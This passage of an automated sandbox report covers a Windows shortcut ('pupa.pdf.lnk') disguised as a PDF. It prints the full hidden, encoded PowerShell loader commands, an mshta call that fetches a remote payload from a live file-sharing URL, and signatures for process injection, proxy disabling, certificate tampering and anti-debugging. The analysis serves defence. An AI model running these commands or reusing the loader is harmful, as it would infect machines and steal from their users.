MAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
cmdline	"C:\Windows\System32\cmd.exe" /c powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
cmdline	"C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77
cmdline	cmd.exe /c powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77')

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\pupa[1]

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 2824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03e20000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 2, 2025, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 2, 2025, 8:52 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA May 2, 2025, 8:52 a.m.	key_handle: 0x000002d4 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	mshta https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77
parent_process	powershell.exe				martian_process	"C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2668
Process injection	Process 2668 resumed a thread in remote process 2824
NtResumeThread May 2, 2025, 8:52 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2668	1	0	0
NtResumeThread May 2, 2025, 8:52 a.m.	thread_handle: 0x00000614 suspend_count: 1 process_identifier: 2824	1	0	0

Creates a suspicious Powershell process (3 events)

option	-nop	value	Does not load current user profile
option	-nop	value	Does not load current user profile
option	-nop	value	Does not load current user profile

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\mshta.exe

pupa.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All